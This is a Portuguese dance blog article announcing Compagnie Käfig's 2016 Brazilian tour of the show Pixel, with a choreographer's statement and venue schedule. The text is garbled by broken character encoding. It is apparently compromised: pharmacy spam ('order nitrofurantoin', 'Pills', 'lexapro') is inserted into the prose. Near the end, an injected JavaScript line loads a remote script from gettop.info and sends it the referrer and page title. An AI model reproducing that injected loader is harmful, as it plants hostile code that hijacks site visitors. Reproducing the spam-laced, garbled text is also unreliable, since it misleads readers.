BahiaBalé/DançaMinas GeraisParanáProgramaçãoRio de JaneiroSão Paulo

Os ousados passos da Compagnie KA�fig

Aclamado espetA?culo Pixel integra Temporada Della��Arte de DanA�a 2016 e passa por seis cidades brasileiras.

 

A partir de 26 de outubro, o Brasil recebe pela primeira vez a Compagnie KA�fig, que apresenta a uniA?o de coreografias ousadas com impressionantes projeA�A�es digitais, criadas por ordine commercialisti Adrien Mondot e Claire Bardainne, no aclamado espetA?culo Pixel. Bailarinos e imagens sA?o unidos no palco a�� a tecnologia do digital colocando o homem como centro das imagens, dando ao pA?blico a sensaA�A?o de nA?o saber mais distinguir a realidade do mundo virtual.

A companhia francesa vai passar por seis cidades brasileiras durante duas semanas e meia. No dia 26 de outubro, a Compagnie KA�fig se apresenta em Belo Horizonte, no PalA?cio das Artes, seguindo para PaulA�nia, no Theatro Municipal, no dia 29. Em novembro, Pixel estarA? no palco do Theatro Municipal do Rio de Janeiro, nos dias 1 e 2, e no Teatro Alfa, em SA?o Paulo, de 5 a 7/11. Para fechar a turnA? brasileira, o espetA?culo tambA�m passarA? por Curitiba, no Teatro GuaA�ra, no dia 10 de novembro, e por Salvador, no Teatro Castro Alves, em 13 de novembro.

Em Pixel, a pesquisa sofisticada de Claire e Adrien dA? vida ao mundo digital de uma maneira artesanal e com extrema sensibilidade. O diretor artA�stico Mourad Merzouki une a danA�a ao delA�rio das imagens, expandindo a linguagem do hip-hop para um cruzamento de mA?ltiplas disciplinas: circo, artes marciais, artes plA?sticas e danA�a contemporA?nea, sem perder de vista as raA�zes de sua danA�a, suas origens sociais e geogrA?ficas.

Os 11 bailarinos da companhia evoluem em um ambiente de sonho, na fronteira entre o virtual e a realidade. A� um trabalho sobre a ilusA?o, conjugando a energia e a poesia, ficA�A?o e proeza tA�cnica, hip-hop e circo, uma verdadeira expressA?o da arte oriunda das mentes delirantes de seus criadores.

Cena de "Pixel"
Cena de “Pixel”

 

Pixel, por Mourad Merzouki

Estamos constantemente expostos a imagens, vA�deos e mA�dias digitais. Telas estA?o por todos os lugares. AlguA�m sA? precisa andar pelas ruas das grandes capitais de alguns paA�ses para imaginar o que serA? a cidade do futuro: uma grande exposiA�A?o de imagens, que agora fazem parte da nossa vida cotidiana.

O projeto Pixel nasceu quando eu conheci Adrien Mondot e Claire Bardainne, e do fascA�nio que senti naquele momento: era como se eu nA?o fosse capaz de perceber a diferenA�a entre os mundos real e virtual. Rapidamente decidi tentar uma nova associaA�A?o usando essas novas tecnologias no mundo da danA�a.

A primeira experiA?ncia misturando danA�a e vA�deos interativos foi de tirar o fA?lego para os artistas que faziam parte do projeto. Com a mesma curiosidade e mente aberta que me inspira, enfrentei, durante essa nova aventura, um mundo impalpA?vel criado pela projeA�A?o de luz desenvolvida por Adrien M / Claire B Company. O desafio de fazer os dois mundos interagirem um com o outro e o de encontrar um equilA�brio sutil entre as duas tA�cnicas, para que a danA�a e as representaA�A�es abstratas, interajam sem que uma delas fique em vantagem sobre a outra, fez com que eu me desestabilizasse novamente com a forma atravA�s da qual abordo o gesto. Sigo essa busca pelo movimento, que continuo a desenvolver e aprimorar em cada uma das minhas criaA�A�es, com novas restriA�A�es e novos parceiros de “jogo”.

AlA�m das projeA�A�es de vA�deo, eu queria que a mA?sica de Armand Amar casasse em perfeita colaboraA�A?o com a coreografia e as imagens, como um convite caloroso para viajar. Acompanhando os artistas, sua mA?sica revela a energia, bem como a poesia que se encontra no corpo do danA�arino.

Pills Esses novos caminhos de descoberta me permitiram trabalhar sobre essa prorrogaA�A?o da realidade e enfrentar um mundo sintA�tico, o que A� estranho para um coreA?grafo que se alimenta de corpos e material. Habitamos a danA�a em um espaA�o onde o corpo sA? enfrenta sonhos, desenvolvendo gestos em paisagens que se movem, criadas por Adrien M e Claire B.

Eu queria abrir o caminho no qual o mundo sintA�tico da projeA�A?o digital interage com a realidade do danA�arino. Pills

Cada artista tem uma brincadeira imersa em um mundo desconhecido, com uma mente que compartilha a energia e o virtuosismo do hip-hop, misturando poesia e sonhos, para criar um show no cruzamento das artes.

 

Fotos: PatrickA�Berger

 

SERVIA�O: order nitrofurantoin

 

“Pixel”

Compagnie KA�fig Pills

 

26 de outubro, quarta-feira, A�s 20h

Buy PalA?cio das Artes (Av. Afonso Pena, 1.537, Centro – Belo Horizonte)

 

Ingressos: de R$ 140 a R$ 50

 

29 de outubro, sA?bado, A�s 21h

Theatro Municipal de PaulA�nia (Av. Pref. JosA� Lozano AraA?jo, 1.551, Parque Brasil 500 a�� PaulA�nia)

 

Ingressos: de R$ 100 a R$ 50

 

1A? de novembro, terA�a-feira, A�s 20h; 2 de novembro, quarta-feira, A�s 15h e 20h

Theatro Municipal do Rio de Janeiro (PraA�a Floriano, s/n, Centro a�� Rio de Janeiro)

 

Ingressos: de R$ 180 a R$ 40

 

5 de novembro, sA?bado, A�s 16h e 20h; 6 de novembro, domingo, A�s 18h; 7 de novembro, segunda-feira, A�s 21h

Teatro Alfa (R. Bento Branco de Andrade Filho, 722, Santo Amaro a�� SA?o Paulo)

 

Ingressos: de R$ 180 a R$ 50

 

10 de novembro, quinta-feira, A�s 21h

Teatro GuaA�ra (R. XV de Novembro, 971, Centro a�� Curitiba)

 

Ingressos: de R$ 160 a R$ 50

 

13 de novembro, domingo, A�s 20h

Teatro Castro Alves (PraA�a Dr. Mario Macedo Costa, s/n, Campo Grande a�� Salvador)

 

Ingressos: de R$ 140 a R$ 40

order nasonex lexapro vs generic escitalopram oxalate
 d.getElementsByTagName(‘head’)[0].appendChild(s);s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.